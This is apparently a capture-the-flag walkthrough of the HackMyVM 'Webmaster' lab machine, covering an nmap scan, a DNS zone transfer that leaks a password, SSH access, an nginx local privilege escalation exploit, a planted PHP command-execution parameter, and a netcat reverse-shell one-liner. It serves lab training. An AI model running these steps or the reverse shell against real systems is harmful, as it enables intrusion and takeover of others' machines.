2021-01-10 23:25:48 +00:00
# HackMyVM-Webmaster
2021-01-10 23:24:02 +00:00
## Netdiscover
< img src = "https://imgur.com/4MBBH8n.png" / >
## NMAP
```
Nmap scan report for 192.168.1.131 [4/84]
Host is up (0.000055s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6d:7e:d2:d5:d0:45:36:d7:c9:ed:3e:1d:5c:86:fb:e4 (RSA)
| 256 04:9d:9a:de:af:31:33:1c:7c:24:4a:97:38:76:f5:f7 (ECDSA)
|_ 256 b0:8c:ed:ea:13:0f:03:2a:f3:60:8a:c3:ba:68:4a:be (ED25519)
53/tcp open domain (unknown banner: not currently available)
| dns-nsid:
|_ bind.version: not currently available
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ currently available
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/11%Time=5FFB65ED%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,52,"\0P\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x18\x17not\x20curren
SF:tly\x20available\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
MAC Address: 08:00:27:FE:8A:1A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.04 seconds
```
## PORT 80
< img src = "https://i.ibb.co/PC2Bbz2/Screenshot-2021-01-11-01-49-39.png" / >
Looking at the source
< img src = "https://i.ibb.co/zSj2DmC/Screenshot-2021-01-11-01-49-39.png" / >
So this `webmaster.hmv` refers to a domain name let's add this to `/etc/hosts` .
Now by adding the domain name we are going to do a `Zone transfer` which is a DNS query type AXFR, is a type of DNS transaction.Zone transfers are typically used to replicate DNS data across a number of DNS servers or to back up DNS files.
< img src = "https://i.ibb.co/7RLr7SW/Screenshot-2021-01-11-01-49-39.png" / >
We got `john` 's passwords so now let's ssh into the machine.
< img src = "https://i.ibb.co/H73FMvG/Screenshot-2021-01-11-01-49-39.png" / >
By running `sudo -l` we can see what can we run as root user
< img src = "https://i.ibb.co/Hx7ksWB/Screenshot-2021-01-11-01-49-39.png" / >
We can find an LPE (Local Privilege Escalation) for nginx
< img src = "https://i.ibb.co/6BN0jgZ/Screenshot-2021-01-11-01-49-39.png" / >
Let's download this to our machine and transfer it to target machine
< img src = "https://i.ibb.co/bPhkV1w/Screenshot-2021-01-11-01-49-39.png" / >
To run this we need to provide the path of nginx error log which is located at `/var/log/nginx/error.log`
Run this like `./40768.sh /var/log/nginx/error.log`
< img src = "https://i.ibb.co/bbLQyLf/Screenshot-2021-01-11-01-49-39.png" / >
But we couldn't run the exploit has it is needed to be run as `www-data` so only thing I could thing was to change the contents of one of the webserver files and insert a simple php GET paramter vulnerable code which will allow us to execute commands
< img src = "https://i.ibb.co/LJ29gxT/Screenshot-2021-01-11-01-49-39.png" / >
< img src = "https://i.ibb.co/4MQyn6r/root.png" / >
Then you can just do `nc your_ip your_netcat_port -e /bin/bash` on `cmd` paramter to get reverse shell
< img src = "https://i.ibb.co/QCZQLxW/Screenshot-2021-01-11-01-49-39.png" / >